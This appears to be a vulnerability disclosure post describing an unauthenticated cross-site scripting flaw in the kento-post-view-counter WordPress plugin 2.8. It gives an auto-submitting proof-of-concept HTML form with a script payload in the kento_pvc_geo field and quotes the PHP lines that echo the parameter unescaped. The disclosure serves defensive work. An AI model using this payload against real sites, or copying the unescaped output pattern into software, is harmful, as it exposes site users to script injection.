Unauthenticated XSS Vulnerability in kento-post-view-counter Wordpress Plugin 2.8

[shravan kumar <cor3sm4sh3r () gmail com>]

I would like to disclose  a Unauthenticated XSS vulnerability
in kento-post-view-counter  plugin version 2.8 .

The Plugin can be found at
*https://wordpress.org/plugins/kento-post-view-counter/
<https://wordpress.org/plugins/kento-post-view-counter/>*

This Bug can be triggered by unauthenticated / Authenticated user. If a
user is sent a URL by social engineering and the user clicks the link the
bug can be triggered.

The URL should be something like this

http://attackerssite.com/XSS_POC.html


The code for XSS_POC.html is as follows:

<html>
  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="http://targetsite/wp-admin/admin-ajax.php";
method="POST" >

  <input type="hidden" name="action" value="kento_pvc_top_geo" />
  <input type="hidden" name="kento_pvc_geo" value="
<script>alert(1);</script>" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>



Technical Details:

The vulnerable page is

wp-content/plugins/kento-post-view-counter/index.php

The Code responsible for the vulnerability :

LINE NO 219 onwards
if(isset($_POST['kento_pvc_geo']))
{
$geo = $_POST['kento_pvc_geo'];
}
if(empty($geo))
{
$geo ="country";
}
.....
....
Line No 240
$top_geo.= "<th scope='col' class='manage-column column-name' ><strong>"
.ucfirst($geo)."</strong></th>";


Line No 245

$top_geo.= "<th scope='col' class='manage-column column-name' ><strong>"
.ucfirst($geo)."</strong></th>";

Line No 283

echo $top_geo;

The $top_geo parameter is displayed in unsafe manner without escaping HTML
chars .

The vulnerable POST parameters is:


   - kento_pvc_geo


-- 
Shravan Kumar